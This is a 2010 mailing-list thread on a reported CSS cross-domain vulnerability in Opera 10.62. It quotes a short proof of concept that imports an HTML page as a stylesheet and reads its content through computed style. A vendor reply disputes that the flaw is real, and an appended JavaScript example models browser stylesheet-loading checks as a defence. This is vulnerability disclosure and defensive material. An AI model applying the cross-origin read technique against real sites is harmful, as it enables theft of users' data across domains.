Re: Opera Web Browser v10.62 (CSS) Cross Domain Vulnerability

2010-09-23 Thread phara0h
Works on Opera 10.70, build 9049 for Linux, too.

On Thu, 23 Sep 2010 04:23:47 -0600
i...@securitylab.ir wrote:

> Proof Of Concept:
> 
> 1.html:
> 
> {}body{DOM:
> Cross Domain Vulnerability
> 
> 
> 2.html:
> 
> @import url("1.html");
> 
> 
> setTimeout(function(){
> var s = document.body.currentStyle.DOM;
> alert(s);
> },0);
> 
> 
> 
> 
> Vulnerable:
> Opera 10.62
> 
> 
> By: Securitylab.ir
> Original Advisory: http://Securitylab.ir/Advisories



Re: Opera Web Browser v10.62 (CSS) Cross Domain Vulnerability

2010-09-24 Thread security
Opera's variation of this vulnerability was fixed back in Opera 10.10. The 
information on this thread is incorrect. The issue shown here does not affect 
Opera, and this code would not have produced an exploit in Opera, even in 
pre-10.10 versions. All it will do is display a message showing that the 
desired property is undefined, meaning that the exploit did not work.
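
Added example, not from either poster and not Opera's code: a simplified model of the check a browser can apply before parsing a response as a stylesheet, so that an HTML page like 1.html pulled in with `@import` from another origin is never exposed through computed style. The host names, the `allowStylesheet` helper and the exact rule set are assumptions for illustration.

```javascript
// Simplified stylesheet load policy (assumed rule set, not any browser's source).
// Header names are expected in lower case.

function essence(contentType) {
  // "text/html; charset=utf-8" -> "text/html"
  return (contentType || "").split(";")[0].trim().toLowerCase();
}

function allowStylesheet(documentUrl, sheetUrl, headers) {
  const doc = new URL(documentUrl);
  const sheet = new URL(sheetUrl, doc); // resolves relative @import targets
  const type = essence(headers["content-type"]);
  const nosniff =
    (headers["x-content-type-options"] || "").trim().toLowerCase() === "nosniff";

  if (type === "text/css") {
    return { allow: true, reason: "declared as text/css" };
  }
  if (nosniff) {
    return { allow: false, reason: "nosniff set and type is not text/css" };
  }
  if (doc.origin !== sheet.origin) {
    return { allow: false, reason: "cross-origin and type is not text/css" };
  }
  // Simplification: real browsers limit this leniency to quirks-mode documents.
  return { allow: true, reason: "same-origin, legacy leniency" };
}

// Constructed sample loads: [importing page, @import target, response headers]
const samples = [
  ["https://b.example/2.html", "https://a.example/1.html",
    { "content-type": "text/html; charset=utf-8" }],
  ["https://b.example/2.html", "https://a.example/site.css",
    { "content-type": "text/css" }],
  ["https://a.example/2.html", "1.html",
    { "content-type": "text/html" }],
  ["https://a.example/2.html", "1.html",
    { "content-type": "text/html", "x-content-type-options": "nosniff" }],
];

for (const [page, target, headers] of samples) {
  const verdict = allowStylesheet(page, target, headers);
  console.log(`${page} -> ${target}: ${verdict.allow ? "load" : "block"} (${verdict.reason})`);
}
```

On the server side, the same outcome is reached by serving HTML with an accurate `Content-Type` and `X-Content-Type-Options: nosniff`.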